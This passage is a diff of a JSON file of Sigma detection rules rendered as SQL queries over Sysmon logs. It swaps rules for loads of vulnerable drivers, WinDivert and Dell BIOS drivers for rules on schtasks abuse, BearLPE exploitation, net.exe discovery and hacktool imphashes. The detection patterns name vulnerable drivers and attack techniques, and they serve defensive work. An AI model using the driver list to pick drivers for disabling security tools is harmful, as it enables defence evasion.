'\\' OR ImageLoaded LIKE '%\\\\dbutil\\_2\\_3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Dh\\_Kernel\\_10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Dh\\_Kernel.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\GLCKIO2.sys' ESCAPE '\\' OR ImageLoaded 
LIKE '%\\\\HOSTNT.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HwRwDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inpoutx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iomem64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Mhyprot2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\MsIo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msrhook.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NTIOLib.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\OpenLibSys.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Se64a.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\smep\\_capcom.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\smep\\_namco.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SysInfo.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VProEventMonitor.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WCPU.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WINIODrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\physmem.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\procexp152.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viraglt64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vboxdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rwdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\speedfan.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kprocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sandra.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\elbycdio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\goad.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aswsnx.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sandbox.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nicm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nscm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncpl.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\elrawdsk.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DBUtilDrv2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_RCIO64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mhyprot.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\EneTechIo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amp.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\EneIo64.sys' ESCAPE 
'\\' OR ImageLoaded LIKE '%\\\\ATSZIO.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NalDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DirectIo32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DirectIo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsUpIO64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrDrv102.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrDrv103.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BSMEMx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BSMIXP64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BSMIx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_Flash64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_HWMIO64\\_W10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_HWMIo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_I2c64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\GVCIDrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HwOs2Ec10x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HwOs2Ec7x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NBIOLib\\_X64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NCHGBIOS2x64.SYS' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NTIOLib\\_X64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PhlashNT.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Phymemx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\UCOREW64.SYS' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinFlash64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbk64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mtcBSv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nvflash.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nvflsh64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\phymem64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkiow10x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkiow8x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\segwindrvx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\superbmc.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\semav6msr.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\piddrv64.sys' ESCAPE '\\' OR ImageLoaded 
LIKE '%\\\\BS\\_I2cIo.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AMDRyzenMasterDriver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\LHA.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kEvP64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BSMI.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TmComm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iQVW64.SYS' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iQVW32.SYS' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vmdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HpPortIox64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AMDPowerProfiler.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\CorsairLLAccess64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\RTCore64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\libnicm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\procexp.Sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viragt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viragt64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrDrv106.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\zamguard64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\zam64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fidpcidrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\MsIo32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\capcom.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\IOMap64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ATSZIO64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aswVmm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FairplayKD.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pgldqpoc.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iqvw64e.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Monitor\\_win10\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srvnetbus.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Mslo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pcdsrvc\\_x64.pkms' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\krpocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HWiNFO64A.sys' ESCAPE '\\' OR ImageLoaded 
LIKE '%\\\\rzpnk.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magdrvamd64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x86-withoutdbg.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x86.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gmer.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PCADRVX64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clfs.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ActiveHealth.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\CAM\\_V3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\GameFire.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\OpenHardwareMonitor.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\OpenHardwareMonitorLib.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\OpenHardwareMonitorReport.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SmartDashboard.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SystemGauge.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SystemGaugeX7.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VideoNovaServerControllerService.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ellp\\_service.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hardwareproviders.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ohm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sensorsview32\\_64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\touchpointanalyticsclient.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\CQg5Jf.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HCdRDh.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NcDgDn.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vLTZ19.sys' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE 
'%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_drivers_names.yml" + "filename": "proc_creation_win_schtasks_folder_combos.yml" }, { - "title": "WinDivert Driver Load", - "id": "679085d5-f427-4484-9f58-1dc30a7c426d", - "status": "experimental", - "description": "Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential BearLPE Exploitation", + "id": "931b6802-d6a6-4267-9ffa-526f57f22aaf", + "status": "test", + "description": "Detects potential exploitation of the BearLPE exploit using Task Scheduler \".job\" import arbitrary DACL write\\par", + "author": "Olaf Hartong", "tags": [ - "attack.collection", - "attack.defense_evasion", - "attack.t1599.001", - "attack.t1557.001" + "attack.privilege_escalation", + "attack.t1053.005", + "car.2013-08-001" ], "falsepositives": [ - "Legitimate WinDivert driver usage" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\WinDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinDivert64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NordDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lingtiwfp.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eswfp.sys%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=0604bb7cb4bb851e2168d5c7d9399087%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2e5f0e649d97f32b03c09e4686d0574f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=52f8aa269f69f0edad9e8fcdaedce276%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c0e5d314da39dbf65a2dbff409cc2c76%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=58623490691babe8330adc81cd04a663%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=8ee39b48656e4d6b8459d7ba7da7438b%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=45ee545ae77e8d43fc70ede9efcd4c96%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a1b2e245acd47e4a348e1a552a02859a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2a5f85fe4609461c6339637594fa9b0a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6b2c6f95233c2914d1d488ee27531acc%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9f2fdd3f9ab922bbb0560a7df46f4342%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=d8a719865c448b1bd2ec241e46ac1c88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0ea54f8c9af4a2fe8367fa457f48ed38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9d519ae0a0864d6d6ae3f8b6c9c70af6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a74929edfc3289895e3f2885278947ae%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a66b476c2d06c370f0a53b5537f2f11e%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bdcd836a46bc2415773f6b5ea77a46e4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c28cd6ccd83179e79dac132a553693d9%' ESCAPE '\\') OR Imphash IN ('0604bb7cb4bb851e2168d5c7d9399087', '2e5f0e649d97f32b03c09e4686d0574f', '52f8aa269f69f0edad9e8fcdaedce276', 'c0e5d314da39dbf65a2dbff409cc2c76', '58623490691babe8330adc81cd04a663', '8ee39b48656e4d6b8459d7ba7da7438b', '45ee545ae77e8d43fc70ede9efcd4c96', 'a1b2e245acd47e4a348e1a552a02859a', '2a5f85fe4609461c6339637594fa9b0a', '6b2c6f95233c2914d1d488ee27531acc', '9f2fdd3f9ab922bbb0560a7df46f4342', 'd8a719865c448b1bd2ec241e46ac1c88', '0ea54f8c9af4a2fe8367fa457f48ed38', '9d519ae0a0864d6d6ae3f8b6c9c70af6', 'a74929edfc3289895e3f2885278947ae', 'a66b476c2d06c370f0a53b5537f2f11e', 'bdcd836a46bc2415773f6b5ea77a46e4', 'c28cd6ccd83179e79dac132a553693d9')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/RP%' ESCAPE '\\'))" ], - "filename": "driver_load_win_windivert.yml" + 
"filename": "proc_creation_win_exploit_other_bearlpe.yml" }, { - "title": "Vulnerable AVAST Anti Rootkit Driver Load", - "id": "7c676970-af4f-43c8-80af-ec9b49952852", + "title": "Net.exe Execution", + "id": "183e7ea8-ac4b-4c23-9aec-b3dac4e401ac", "status": "experimental", - "description": "Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of Net.exe, whether suspicious or benign.", + "author": "Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.discovery", + "attack.t1007", + "attack.t1049", + "attack.t1018", + "attack.t1135", + "attack.t1201", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1087.001", + "attack.t1087.002", + "attack.lateral_movement", + "attack.t1021.002", + "attack.s0039" ], "falsepositives": [ - "Unknown" + "Will need to be tuned. If using Splunk, I recommend | stats count by Computer,CommandLine following the search for easy hunting by computer/CommandLine." 
], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Hashes LIKE '%MD5=a179c4093d05a3e1ee73f6ff07f994aa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1%' ESCAPE '\\') OR md5 = 'a179c4093d05a3e1ee73f6ff07f994aa' OR sha1 = '5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4' OR sha256 = '4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1') OR (ImageLoaded LIKE '%\\\\aswArPot.sys' ESCAPE '\\' AND (Signed = 'false' OR SignatureStatus = 'Expired'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% group%' ESCAPE '\\' OR CommandLine LIKE '% localgroup%' ESCAPE '\\' OR CommandLine LIKE '% user%' ESCAPE '\\' OR CommandLine LIKE '% view%' ESCAPE '\\' OR CommandLine LIKE '% share%' ESCAPE '\\' OR CommandLine LIKE '% accounts%' ESCAPE '\\' OR CommandLine LIKE '% stop %' ESCAPE '\\' OR CommandLine LIKE '% start%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_avast_anti_rootkit_driver.yml" + "filename": "proc_creation_win_net_susp_execution.yml" }, { - "title": "Vulnerable Dell BIOS Update Driver Load", - "id": "21b23707-60d6-41bb-96e3-0f0481b0fed9", + "title": "Suspicious Hacktool Execution - Imphash", + "id": "24e3e58a-646b-4b50-adef-02ef935b9fc8", "status": "experimental", - "description": "Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551", + "description": "Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.privilege_escalation", - 
"cve.2021.21551", - "attack.t1543", - "attack.t1068" - ], "falsepositives": [ - "Legitimate BIOS driver updates (should be rare)" + "Legitimate use of one of these tools" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\DBUtil\\_2\\_3.Sys%' ESCAPE '\\' OR (Hashes LIKE '%SHA256=0296E2CE999E67C76352613A718E11516FE1B0EFC3FFDB8918FC999DD76A73A5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=DDBF5ECCA5C8086AFDE1FB4F551E9E6400E94F4428FE7FB5559DA5CFFA654CC1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C948AE14761095E4D76B55D9DE86412258BE7AFD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=10B30BDEE43B3A2EC4AA63375577ADE650269D25%' ESCAPE '\\' OR Hashes LIKE '%MD5=C996D7971C49252C582171D9380360F2%' ESCAPE '\\' OR Hashes LIKE '%MD5=D2FD132AB7BBC6BBB87A84F026FA0244%' ESCAPE '\\') OR sha256 IN ('0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1') OR sha1 IN ('c948ae14761095e4d76b55d9de86412258be7afd', '10b30bdee43b3a2ec4aa63375577ade650269d25') OR md5 IN ('c996d7971c49252c582171d9380360f2', 'd2fd132ab7bbc6bbb87a84f026fa0244')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', 
'23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', 
'5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b') OR (Hashes LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hashes LIKE 